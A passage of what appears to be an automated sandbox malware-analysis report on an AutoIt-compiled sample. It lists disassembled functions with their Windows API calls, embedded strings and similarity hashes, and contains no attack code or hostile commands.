                                          • GetSystemMetrics.USER32(00000008), ref: 009028F7
                                          • GetSystemMetrics.USER32(00000004), ref: 0090291C
                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00902939
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00902949
                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0090297C
                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00902990
                                          • GetClientRect.USER32(00000000,000000FF), ref: 009029AE
                                          • GetStockObject.GDI32(00000011), ref: 009029CA
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 009029D5
                                            • Part of subcall function 00902344: GetCursorPos.USER32(?), ref: 00902357
                                            • Part of subcall function 00902344: ScreenToClient.USER32(009C57B0,?), ref: 00902374
                                            • Part of subcall function 00902344: GetAsyncKeyState.USER32(00000001), ref: 00902399
                                            • Part of subcall function 00902344: GetAsyncKeyState.USER32(00000002), ref: 009023A7
                                          • SetTimer.USER32(00000000,00000000,00000028,00901256), ref: 009029FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: a432ec986b5de02abbbf71c9abc3e6cdcac5b7ba5e05aa67641e44efc8a8a3f3
                                          • Instruction ID: 10836ff4604b2ef2423379263290f3acba601004f47d334fff25803e56cce972
                                          • Opcode Fuzzy Hash: a432ec986b5de02abbbf71c9abc3e6cdcac5b7ba5e05aa67641e44efc8a8a3f3
                                          • Instruction Fuzzy Hash: DEB18D71A1460AEFDB14DFA8CC59BAE7BB4FB48314F104229FA15E72E0DB74A850DB50
                                          Function 0095A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0095A47A
                                          • __swprintf.LIBCMT ref: 0095A51B
                                          • _wcscmp.LIBCMT ref: 0095A52E
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0095A583
                                          • _wcscmp.LIBCMT ref: 0095A5BF
                                          • GetClassNameW.USER32(?,?,00000400), ref: 0095A5F6
                                          • GetDlgCtrlID.USER32(?), ref: 0095A648
                                          • GetWindowRect.USER32(?,?), ref: 0095A67E
                                          • GetParent.USER32(?), ref: 0095A69C
                                          • ScreenToClient.USER32(00000000), ref: 0095A6A3
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0095A71D
                                          • _wcscmp.LIBCMT ref: 0095A731
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0095A757
                                          • _wcscmp.LIBCMT ref: 0095A76B
                                            • Part of subcall function 0092362C: _iswctype.LIBCMT ref: 00923634
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                          • String ID: %s%u
                                          • API String ID: 3744389584-679674701
                                          • Opcode ID: 25849cff77dd8f021fd777b7eaf8631b383860f3f8afe15b6548fd9ebb72aaa9
                                          • Instruction ID: e660ea68fcdbfa8375c89cfb79a5056fbdd2f9b60b97d92761e74260702d3891
                                          • Opcode Fuzzy Hash: 25849cff77dd8f021fd777b7eaf8631b383860f3f8afe15b6548fd9ebb72aaa9
                                          • Instruction Fuzzy Hash: 02A1D231604206AFD714DF61C884FAAB7ECFF48316F048629FD99C2190DB34E959CB96
                                          Function 0095AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0095AF18
                                          • _wcscmp.LIBCMT ref: 0095AF29
                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0095AF51
                                          • CharUpperBuffW.USER32(?,00000000), ref: 0095AF6E
                                          • _wcscmp.LIBCMT ref: 0095AF8C
                                          • _wcsstr.LIBCMT ref: 0095AF9D
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0095AFD5
                                          • _wcscmp.LIBCMT ref: 0095AFE5
                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0095B00C
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0095B055
                                          • _wcscmp.LIBCMT ref: 0095B065
                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0095B08D
                                          • GetWindowRect.USER32(00000004,?), ref: 0095B0F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                          • String ID: @$ThumbnailClass
                                          • API String ID: 1788623398-1539354611
                                          • Opcode ID: e2aa9a1641ff2a009d245e6f96882b46050f5e3811f7b091b5ba1cae87abd484
                                          • Instruction ID: fd5b6098a77c1bdae30c82f6003ced9c4e0fa28203f190609dc8b4771f22da1e
                                          • Opcode Fuzzy Hash: e2aa9a1641ff2a009d245e6f96882b46050f5e3811f7b091b5ba1cae87abd484
                                          • Instruction Fuzzy Hash: A081B1711082099FDB05DF22C891FAABBECEF84315F14856AFD898A095DB34DD4DCBA1
                                          Function 0095ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                          • API String ID: 1038674560-1810252412
                                          • Opcode ID: dd180425e7dd66b10587364051b3f5f96d1f46c76be405978f34035190163ca0
                                          • Instruction ID: 6c95a42fff4265bb8939baeb132d3d32451a157fe6f7e78adf2131a8ca27a90e
                                          • Opcode Fuzzy Hash: dd180425e7dd66b10587364051b3f5f96d1f46c76be405978f34035190163ca0
                                          • Instruction Fuzzy Hash: 32318431A48209AFDB14FAA1EE03FEEB768AF90725F600619F841710D5EF556F08C656
                                          Function 00974FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00975013
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0097501E
                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00975029
                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00975034
                                          • LoadCursorW.USER32(00000000,00007F01), ref: 0097503F
                                          • LoadCursorW.USER32(00000000,00007F81), ref: 0097504A
                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00975055
                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00975060
                                          • LoadCursorW.USER32(00000000,00007F86), ref: 0097506B
                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00975076
                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00975081
                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0097508C
                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00975097
                                          • LoadCursorW.USER32(00000000,00007F04), ref: 009750A2
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 009750AD
                                          • LoadCursorW.USER32(00000000,00007F89), ref: 009750B8
                                          • GetCursorInfo.USER32(?), ref: 009750C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Cursor$Load$Info
                                          • String ID:
                                          • API String ID: 2577412497-0
                                          • Opcode ID: 0f1dce294085259b7eebffc95076f9eba56b9a42ef250c1a10797671a24e957d
                                          • Instruction ID: c6c8272fe6d23e9826ec1d42b18e4fcac83f08bce1f774a8f889943ab0926c83
                                          • Opcode Fuzzy Hash: 0f1dce294085259b7eebffc95076f9eba56b9a42ef250c1a10797671a24e957d
                                          • Instruction Fuzzy Hash: 5131D2B1D48319AADF509FB68C8996EBFE8FF04750F50852AE50DE7281DA78A5008F91
                                          Function 0098A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0098A259
                                          • DestroyWindow.USER32(?,?), ref: 0098A2D3
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0098A34D
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0098A36F
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0098A382
                                          • DestroyWindow.USER32(00000000), ref: 0098A3A4
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00900000,00000000), ref: 0098A3DB
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0098A3F4
                                          • GetDesktopWindow.USER32 ref: 0098A40D
                                          • GetWindowRect.USER32(00000000), ref: 0098A414
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0098A42C
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0098A444
                                            • Part of subcall function 009025DB: GetWindowLongW.USER32(?,000000EB), ref: 009025EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                          • String ID: 0$tooltips_class32
                                          • API String ID: 1297703922-3619404913
                                          • Opcode ID: 02fe58e7540f2bf34bc1b9136ee9a8b47c7a7a8ea4edd42e0e3d7f59b10f6d6c
                                          • Instruction ID: 703afaa598e33865ba59f6b8a9305dc004eb9c60fbd1785b8666851098f7b912
                                          • Opcode Fuzzy Hash: 02fe58e7540f2bf34bc1b9136ee9a8b47c7a7a8ea4edd42e0e3d7f59b10f6d6c
                                          • Instruction Fuzzy Hash: 78719870555204AFEB21DF28CC48F6A7BE9FB88304F04452EF9858B3B0D774A946DB62
                                          Function 0098C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • DragQueryPoint.SHELL32(?,?), ref: 0098C627
                                            • Part of subcall function 0098AB37: ClientToScreen.USER32(?,?), ref: 0098AB60
                                            • Part of subcall function 0098AB37: GetWindowRect.USER32(?,?), ref: 0098ABD6
                                            • Part of subcall function 0098AB37: PtInRect.USER32(?,?,0098C014), ref: 0098ABE6
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0098C690
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0098C69B
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0098C6BE
                                          • _wcscat.LIBCMT ref: 0098C6EE
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0098C705
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0098C71E
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0098C735
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0098C757
                                          • DragFinish.SHELL32(?), ref: 0098C75E
                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0098C851
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                          • API String ID: 169749273-3440237614
                                          • Opcode ID: e47cf1e3d0adbbe162eaba90eb55c103ba2edac111979ab2ba559e429a7ff488
                                          • Instruction ID: 08e936cfeb576a8e15eeae24cc1cee65c88f2fe0d3015fdb30a841368576d5b6
                                          • Opcode Fuzzy Hash: e47cf1e3d0adbbe162eaba90eb55c103ba2edac111979ab2ba559e429a7ff488
                                          • Instruction Fuzzy Hash: 19617C71518305AFC701EF64CC95EAFBBE8EFC9714F00092EF595962A1DB30A949CB62
                                          Function 00984392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00984424
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0098446F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 3974292440-4258414348
                                          • Opcode ID: 1d97eaa975f1954a844ef278983d981aded5b6d5b1eaee432a2125ca4a387043
                                          • Instruction ID: d76de2859b50d0a9e18391142e2ff12e0ebbfd10219669001d0855c79e4e5d89
                                          • Opcode Fuzzy Hash: 1d97eaa975f1954a844ef278983d981aded5b6d5b1eaee432a2125ca4a387043
                                          • Instruction Fuzzy Hash: 459136702047129FCB14EF20C891B6EB7E5AF95354F458868F8965B3A2DB35ED0ACB81
                                          Function 0098B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0098B8B4
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009891C2), ref: 0098B910
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0098B949
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0098B98C
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0098B9C3
                                          • FreeLibrary.KERNEL32(?), ref: 0098B9CF
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0098B9DF
                                          • DestroyIcon.USER32(?,?,?,?,?,009891C2), ref: 0098B9EE
                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0098BA0B
                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0098BA17
                                            • Part of subcall function 00922EFD: __wcsicmp_l.LIBCMT ref: 00922F86
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                          • String ID: .dll$.exe$.icl
                                          • API String ID: 1212759294-1154884017
                                          • Opcode ID: 16a3c1454f40cf1755aa9c5d4ff67e4cf571ea51bcfe1636d31b807fd9ee494d
                                          • Instruction ID: 5cf5024ad33ae5a87d1c148933ffc2e2a92f8194aecfadc33d3bde81efb6afaf
                                          • Opcode Fuzzy Hash: 16a3c1454f40cf1755aa9c5d4ff67e4cf571ea51bcfe1636d31b807fd9ee494d
                                          • Instruction Fuzzy Hash: 9C610F71900219BEEB14EF64DC41FBE7BACEB08724F108516FE15D62D1DB75A980EBA0
                                          Function 0096DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocalTime.KERNEL32(?), ref: 0096DCDC
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0096DCEC
                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0096DCF8
                                          • __wsplitpath.LIBCMT ref: 0096DD56
                                          • _wcscat.LIBCMT ref: 0096DD6E
                                          • _wcscat.LIBCMT ref: 0096DD80
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0096DD95
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096DDA9
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096DDDB
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0096DDFC
                                          • _wcscpy.LIBCMT ref: 0096DE08
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0096DE47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                          • String ID: *.*
                                          • API String ID: 3566783562-438819550
                                          • Opcode ID: 9682069299df2cb9154ce47cd900a6b5f4fccb64d47572e793ad48b8548205a4
                                          • Instruction ID: 83d68ceb964e62247289fba1485df1881030301572900612923c3962d67a4ea7
                                          • Opcode Fuzzy Hash: 9682069299df2cb9154ce47cd900a6b5f4fccb64d47572e793ad48b8548205a4
                                          • Instruction Fuzzy Hash: 9D615C726042059FCB10EF60C854AAEB7E8FFC9314F04891EF999D7251DB35E945CB92
                                          Function 00969C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00969C7F
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00969CA0
                                          • __swprintf.LIBCMT ref: 00969CF9
                                          • __swprintf.LIBCMT ref: 00969D12
                                          • _wprintf.LIBCMT ref: 00969DB9
                                          • _wprintf.LIBCMT ref: 00969DD7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 311963372-3080491070
                                          • Opcode ID: acbabc42fa9ea9655e02e305aa76f077a8ce6ca355d1a6c7313020f1a4c65daa
                                          • Instruction ID: 99f05e3e3768a1f495b3ac479a36690438ae88036252db8caa30ff0cba253293
                                          • Opcode Fuzzy Hash: acbabc42fa9ea9655e02e305aa76f077a8ce6ca355d1a6c7313020f1a4c65daa
                                          • Instruction Fuzzy Hash: B4518832D00609AECF14EBE0DE56EEEB77CAF48314F600065B519721A2EB312E59DB61
                                          Function 0096A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • CharLowerBuffW.USER32(?,?), ref: 0096A3CB
                                          • GetDriveTypeW.KERNEL32 ref: 0096A418
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096A460
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096A497
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096A4C5
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                          • API String ID: 2698844021-4113822522
                                          • Opcode ID: 1d3ed09fb1ae3e01c8329efed21175fe7139e66583c247edc03d4bbabf794338
                                          • Instruction ID: 2903d29ad950294fd3fbd99ab75314c5ec667120a89994d6376ea5f9901bd667
                                          • Opcode Fuzzy Hash: 1d3ed09fb1ae3e01c8329efed21175fe7139e66583c247edc03d4bbabf794338
                                          • Instruction Fuzzy Hash: 54511C715183059FC700EF10C99196BB7E8EF98728F50896DF89A672A2DB31ED09CF52
                                          Function 0095F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0093E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0095F8DF
                                          • LoadStringW.USER32(00000000,?,0093E029,00000001), ref: 0095F8E8
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • GetModuleHandleW.KERNEL32(00000000,009C5310,?,00000FFF,?,?,0093E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0095F90A
                                          • LoadStringW.USER32(00000000,?,0093E029,00000001), ref: 0095F90D
                                          • __swprintf.LIBCMT ref: 0095F95D
                                          • __swprintf.LIBCMT ref: 0095F96E
                                          • _wprintf.LIBCMT ref: 0095FA17
